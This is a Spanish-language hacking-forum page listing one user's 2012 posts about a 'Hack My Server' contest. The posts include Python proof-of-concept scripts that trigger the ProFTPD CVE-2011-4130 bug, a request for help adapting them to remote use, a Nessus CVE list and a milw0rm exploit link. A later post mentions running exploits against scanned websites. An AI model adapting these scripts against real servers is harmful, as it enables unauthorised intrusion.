elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7
51  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 4 Mayo 2012, 01:57 am
Creo que con Shadow Security Scan se pueden ver las Vulnerabilidades de un server :o

Lógico, para eso sirve un escaner de vulnerabilidades. Te recomiendo que te mires otro escaner, ya que ese es un poco para novatos y no me convence demasiado. Yo utilizo nessus integrado en metaexploit framework con backtrack 5. Es fácil de instalar y usar te recomiendo que le eches un vistazo. Si no también tienes OpenVas, NeXpose y un largo etcétera. Saludos.
52  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 3 Mayo 2012, 20:56 pm
Seria muy interesante saber explotar esta vulnerabilidad ya que aunque no nos sirva para este caso, hay muchisimos hosts con una version inferior, que seria vulnerable, lo malo es que si lo descubrimos y posteamos aqui puede haber algun usuario malintencionado que se dedique a reventar todo lo que pille :S .Si no conseguimos nada pues se podria crear un usuario y probarla ya que dimitrix tiene acceso. Un saludo.
53  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 3 Mayo 2012, 20:08 pm
Evidentemente es indiferente ya que es una cosa organizada y legal.



Bueno, a lo que iba.

CVE-2011-4130, es vulnerable hasta la 1.3.3g diria

Si hacéis el exploit para este bug podreis compromenter todos los proftpd excepto los 1.3.4 y el 1.3.3g. Este es el c.

Pues nada yo tengo el server 1.3.3c bajado que le estuve echando un ojo. Lo probare con ubuntu 10.04 lts ya que dimitrix se ha tomado la molestia de comentarlo.

Lo comento porque la naturaleza del concurso es ir poniendo el desarrollo o en que estamos trabajando.

Realmente el exploit si que existe pero es de pago o solo para organizaciones que se dedican a la seguridad o gobiernos.

Bueno ya os comento si avanzo.

Saludos.

Saludos morf en la pagina anterior de este mismo post hay un mensaje mio diciendo lo mismo pero no he tenido tiempo para probarla, http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html

En ese enlace tienes los 2 scripts para probar la vulnerabilidad, son para modo local y necesitas una cuenta y un archivo que descargar tenlo en cuenta. Pruebalo y nos comentas. Un saludo!

Se me olvidaba, el comando falso "WXYZ 0wn3d" debe ir así "WXYZ *0wn3d/"

Si quereis un analisis completo de esta vulnerabilidad aqui teneis: http://blog.buguroo.com/?p=3951
54  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 2 Mayo 2012, 23:14 pm
Hola señores, todavia no he mirado nada de esto, se sabe si hay alguna cuenta en el FTP? Buscando por la red encontre una vulnerabilidad para las versiones inferiores a la 1.3.3g. La vulnerabilidad se basa en enviar un comando inexistente o erroneo al servidor mientras se esta descargando o subiendo un archivo. La vulnerabilidad permitiria inyectar cogido arbitrario.

http://foro.elhacker.net/scripting/ayuda_con_script_python-t360564.0.html

En ese link creado por mi teneis los scripts pero para uso local y necesitamos alguien con conocimientos en python para que lo pase a remoto, yo lo he intentado pero no tengo ni idea de python si alguien sabe que ponga la respuesta en el link. Un saludo y suerte.
55  Programación / Scripting / Re: Ayuda con script python en: 2 Mayo 2012, 08:33 am
Código
  1. #!/usr/bin/env python
  2.  
  3. import threading
  4. from ftplib import FTP
  5.  
  6. ftpIP=''
  7. ftpUser=''
  8. ftpPass=''
  9. ftpFilename=''
  10. i=0
  11. class ThreadC ( threading.Thread ) :
  12.  
  13. def run (self):
  14.  
  15.   ftp = FTP(ftpIP)
  16.           ftp.getwelcome()  
  17.   ftp.login(ftpUser,ftpPass)
  18.   ftp.retrbinary('RETR ' + ftpFilename)
  19.           i=1
  20.  
  21. class ThreadF ( threading.Thread ) :
  22.  
  23. def run (self):
  24.  
  25.          ftp.sendcmd('WXZY *Xenomorfo77/')
  26.  
  27.  
  28. ThreadC.start()
  29. if i == 1:
  30.   ThreadF.start()

Esto es lo que tengo por el momento ya que no tengo ni pajolera idea de python alguien me puede decir si voy bien encaminado? Tambien como hacer para iniciar el proceso F cuando el C este transfiriendo, ya que lo de i = 1, es una porqueria, me tira un error en TreadC.start() que argumento debo poner? Un saludo.
56  Programación / Scripting / Re: Ayuda con script python en: 2 Mayo 2012, 07:45 am
Gracias Runex y perdona mi ignorancia pero la libreria ftplib hay que descargarla o ya viene en el sistema?
57  Programación / Scripting / Ayuda con script python en: 2 Mayo 2012, 06:00 am
Hola, he encontrado la manera de explotar una vulnerabilidad en ProFTPD < 1.3.3g pero necesito ayuda para modificar los scripts. La vulnerabilidad reside en enviar un comando inexistente mientras se esta descargando un archivo lo que permite ejecutar codigo. Los scripts estan diseñados para hacerlo en una LAN pero quiero modificarlos para que sirva remotamente.

Este es el primer script:
Código
  1. #!/usr/bin/env python
  2.  
  3. # Parameters
  4. ftpClient = "192.168.1.11"
  5. ftpClientPort = "1025"
  6.  
  7. import socket
  8. import time
  9.  
  10. # Open a socket to receive data    
  11. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  12. s.bind((ftpClient,int(ftpClientPort)))
  13. s.listen(5)        
  14.  
  15. client, address = s.accept()
  16. print client.recv(2)
  17. time.sleep(5)
  18. print client.recv(1024)
  19. client.close()
  20.  
Crea una conexion de datos, lee 2 bytes y espera 5 segundos para que el 2º script envie el comando falso al servidor.

Aqui va el segundo script:

Código
  1. #!/usr/bin/env python
  2.  
  3. # Parameters
  4. ftpServer = "192.168.1.10"
  5. ftpServerPort = 21
  6. ftpUsername = "user"
  7. ftpPassword = "password"
  8. ftpClient = "192.168.1.11"
  9. ftpClientPort = "1025"
  10.  
  11. # Commands to trigger the segmentation fault.
  12. ftpCommands = """USER %s
  13. PASS %s
  14. SYST
  15. TYPE A
  16. PORT %s,%s
  17. RETR nada
  18. WXYZ 0wn3d
  19. QUIT
  20. """ % (ftpUsername, ftpPassword, ftpClient.replace('.',','), "%s,%s"%(("%04x"%int(ftpClientPort))[0:2],("%04x"%int(ftpClientPort))[2:4]))
  21.  
  22. import socket
  23.  
  24. # Open commands socket
  25. sc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  26. sc.connect((ftpServer,ftpServerPort))
  27.  
  28. # Will send FTP commands.
  29. for command in ftpCommands.split('\n'):
  30.    print sc.recv(1024),    
  31.    sc.send(command+'\r\n')
  32.    print command


Lo que quisiera modificar es el comando PORT que se envia por un PASV pero en el primer script no puedo poner una ip publica a ftpClient y no recoje los datos del puerto 1025. ¿Alguna manera de hacerlo? Aviso que no se programar en python pero si me dan una idea me pondre a intentarlo. Un saludo y Gracias.


Elektro H@cker: Usa el botón "insertar código" o el próximo código será eliminado. Salu2.
58  Seguridad Informática / Hacking / Re: Concurso Nº1: "Hack My Server" en: 2 Mayo 2012, 02:30 am
Yo tambien me apunto, todo sea por aprender. Un saludo a todos.
59  Seguridad Informática / Hacking / Ayuda con vulnerabilidades en: 2 Mayo 2012, 00:52 am
Hola a todos, lo primero pedir disculpas por si el post no iva aqui si es asi muevanlo.

Estoy intentando acceder a un host con fines de aprendizaje, tengo permiso para hacerlo. He escaneado los puertos con nmap y he hecho un análisis con nessus integrado en msf, pero a la hora de interpretar los resultados me quedo un poco pillado ya que no entiendo bien como se explotarian esos fallos. Las vulnerabilidades mas graves son estas:


CVE-2006-3918
-------------------------------------------------------------------------------------------------
http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP
 Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header
 from an HTTP request when it is reflected back in an error message, which might allow cross-site
scripting (XSS) style attacks using web client components that can send arbitrary headers in requests,
 as demonstrated using a Flash SWF file.
----------------------------------------------------------------------------------------------------
CVE-2007-1581
----------------------------------------------------------------------------------------------------
The resource system in PHP 5.0.0 through 5.2.1 allows context-dependent attackers to execute arbitrary
code by interrupting the hash_update_file function via a userspace (1) error or (2) stream handler, which
 can then be used to destroy and modify internal resources. NOTE: it was later reported that PHP 5.2 through
5.2.13 and 5.3 through 5.3.2 are also affected.
www.milw0rm.com/exploits/3529
------------------------------------------------------------------------------------------------------
CVE-2008-5814
-----------------------------------------------------------------------------------------------------
Cross-site scripting (XSS) vulnerability in PHP, possibly 5.2.7 and earlier, when display_errors is enabled,
 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: because of the
 lack of details, it is unclear whether this is related to CVE-2006-0208.
-----------------------------------------------------------------------------------------------------
CVE-2008-2371
-----------------------------------------------------------------------------------------------------
Heap-based buffer overflow in pcre_compile.c in the Perl-Compatible Regular Expression (PCRE) library 7.7
allows context-dependent attackers to cause a denial of service (crash) or possibly execute arbitrary code
 via a regular expression that begins with an option and contains multiple branches.
------------------------------------------------------------------------------------------------------
CVE-2008-5498
------------------------------------------------------------------------------------------------------
Array index error in the imageRotate function in PHP 5.2.8 and earlier allows context-dependent attackers to
 read the contents of arbitrary memory locations via a crafted value of the third argument
(aka the bgd_color or clrBack argument) for an indexed image.
------------------------------------------------------------------------------------------------------
CVE-2009-3557
------------------------------------------------------------------------------------------------------
The tempnam function in ext/standard/file.c in PHP before 5.2.12 and 5.3.x before 5.3.1 allows
context-dependent attackers to bypass safe_mode restrictions, and create files in group-writable
 or world-writable directories, via the dir and prefix arguments.
------------------------------------------------------------------------------------------------------
CVE-2009-3555
------------------------------------------------------------------------------------------------------
The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in
 Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and
 earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4
and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes
 with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions,
 and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request
 that is processed retroactively by a server in a post-renegotiation context, related to a
 "plaintext injection" attack, aka the "Project Mogul" issue.
------------------------------------------------------------------------------------------------------
CVE-2009-3291
------------------------------------------------------------------------------------------------------
The php_openssl_apply_verification_policy function in PHP before 5.2.11 does not properly perform
 certificate validation, which has unknown impact and attack vectors, probably related to an ability
 to spoof certificates.
------------------------------------------------------------------------------------------------------
CVE-2009-2687
-----------------------------------------------------------------------------------------------------
The exif_read_data function in the Exif module in PHP before 5.2.10 allows remote attackers to cause a
 denial of service (crash) via a malformed JPEG image with invalid offset fields, a different issue than CVE-2005-3353.
-----------------------------------------------------------------------------------------------------
CVE-2010-1128
-----------------------------------------------------------------------------------------------------
The Linear Congruential Generator (LCG) in PHP before 5.2.13 does not provide the expected entropy,
 which makes it easier for context-dependent attackers to guess values that were intended to be unpredictable,
 as demonstrated by session cookies generated by using the uniqid function.
-----------------------------------------------------------------------------------------------------
CVE-2010-3436
-----------------------------------------------------------------------------------------------------
fopen_wrappers.c in PHP 5.3.x through 5.3.3 might allow remote attackers to bypass open_basedir restrictions
 via vectors related to the length of a filename.
------------------------------------------------------------------------------------------------------
CVE-2010-4645
------------------------------------------------------------------------------------------------------
strtod.c, as used in the zend_strtod function in PHP 5.2 before 5.2.17 and 5.3 before 5.3.5, and other products,
allows context-dependent attackers to cause a denial of service (infinite loop) via a certain floating-point
 value in scientific notation, which is not properly handled in x87 FPU registers,
 as demonstrated using 2.2250738585072011e-308.
------------------------------------------------------------------------------------------------------
CVE-2011-3389
-----------------------------------------------------------------------------------------------------
The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer,
 Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained
initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via
a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with javascript code that
uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API,
aka a "BEAST" attack.
-----------------------------------------------------------------------------------------------------
CVE-2011-0411
-----------------------------------------------------------------------------------------------------
The STARTTLS implementation in Postfix 2.4.x before 2.4.16, 2.5.x before 2.5.12, 2.6.x before 2.6.9,
and 2.7.x before 2.7.3 does not properly restrict I/O buffering, which allows man-in-the-middle attackers
 to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after
 TLS is in place, related to a "plaintext command injection" attack.
------------------------------------------------------------------------------------------------------
CVE-2011-4566
------------------------------------------------------------------------------------------------------
Integer overflow in the exif_process_IFD_TAG function in exif.c in the exif extension in PHP 5.4.0beta2
on 32-bit platforms allows remote attackers to read the contents of arbitrary memory locations or cause
a denial of service via a crafted offset_val value in an EXIF header in a JPEG file, a different
vulnerability than CVE-2011-0708.
------------------------------------------------------------------------------------------------------
CVE-2012-0053
------------------------------------------------------------------------------------------------------
Protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information
 during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain
 the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction
 with crafted web script.



¿Alguien sabe como se usaria alguna de estas vulnerabiliades?

Un saludo y gracias.
60  Seguridad Informática / Bugs y Exploits / Re: Problema con compilación en: 23 Enero 2012, 12:05 pm
Muchas gracias me ha quedado claro, como veo que estas puesto en el tema me gustaría preguntarte algo más: He escaneado varias páginas con nmap y he buscado vulnerabilidades para los servicios que tenían, he probado todos los exploits que he encontrado y nada... la pregunta es: ¿Ahora que hago?
Páginas: 1 2 3 4 5 [6] 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines